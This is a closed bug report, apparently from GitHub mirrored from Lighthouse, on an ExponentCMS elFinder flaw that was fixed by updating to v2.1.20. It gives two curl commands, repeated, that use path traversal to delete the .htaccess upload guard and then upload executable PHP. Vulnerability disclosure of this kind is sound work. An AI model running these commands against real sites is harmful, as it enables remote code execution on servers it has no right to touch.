Closed exponentcms closed 4 years ago
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example: curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
Issue has been addressed in 333rd party library and will be applied to exponent as soon as feasible https://github.com/Studio-42/elFinder/issues/1843
Fixed by recent push to update elFinder to v2.1.20
Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1404
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example: curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"